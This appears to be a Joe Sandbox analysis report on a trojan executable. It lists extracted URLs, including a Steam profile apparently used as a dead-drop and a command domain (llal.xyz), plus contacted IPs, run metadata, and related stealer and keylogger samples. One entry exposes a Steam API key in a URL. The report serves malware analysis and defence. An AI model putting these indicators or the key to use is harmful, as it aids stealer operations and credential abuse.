                                                                                                          https://llal.xyzuserOXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://store.steampowered.com/subscriber_agreement/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                            		high
                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                              		high
                                                                                                              https://recaptcha.net/recaptcha/;OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://steamcommunity.com/discussions/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                  		high
                                                                                                                  https://store.steampowered.com/poinOXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://steamcommunity.com/profiles/76561199619938930/badgesOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/stats/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                          		high
                                                                                                                          https://medal.tvOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://broadcast.st.dl.eccdnx.comOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://store.steampowered.com/steam_refunds/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://steamcommunity.com/profiles/76561199619938930VOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://api.steampowerWOXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://steamcommunity.com/profiles/76561199619938930OOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://steamcommunity.com/workshop/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://login.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/legal/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://recaptcha.netOXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dbOXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/76561199619938930[1].htm.0.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=eOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://127.0.0.1:27060OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199619938930[1].htm.0.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d3OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://help.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://api.steampowered.com/OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltypeOXoeX1Ii3x.exefalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://store.steampowered.com/mobileOXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drfalse
                                                                                                                                                                                          		high

                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public IPs

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          188.114.96.3
                                                                                                                                                                                          		llal.xyzEuropean Union
                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                          104.102.49.254
                                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                                          		16625AKAMAI-ASUSfalse

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                          Analysis ID:1582973
                                                                                                                                                                                          Start date and time:2025-01-01 09:11:15 +01:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 5m 38s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Run name:Run with higher sleep bypass
                                                                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Sample name:OXoeX1Ii3x.exe
                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                          Original Sample Name:3e9881b9c6ff4994fc9d684456694e77.exe
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal84.troj.winEXE@2/6@2/2
                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          • Number of executed functions: 9
                                                                                                                                                                                          • Number of non-executed functions: 92
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                          Warnings

                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.182.143.212, 40.126.32.140, 4.175.87.197, 13.107.246.45, 52.149.20.212
                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          No simulations

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          188.114.96.3QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                          • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                                                                                                          CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • www.mffnow.info/1a34/
                                                                                                                                                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • www.mydreamdeal.click/1ag2/
                                                                                                                                                                                          SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • www.questmatch.pro/ipd6/
                                                                                                                                                                                          QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                          • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                                                                                                          need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                          • www.rtpwslot888gol.sbs/jmkz/
                                                                                                                                                                                          QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                          • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                                                                                                          http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                                                                          104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                          • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                          http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • www.valvesoftware.com/legal.htm

                                                                                                                                                                                          Domains

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          llal.xyz0x001900000002ab40-59.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                          steamcommunity.comExlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                          Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 104.121.10.34
                                                                                                                                                                                          iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                          oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 23.55.153.106
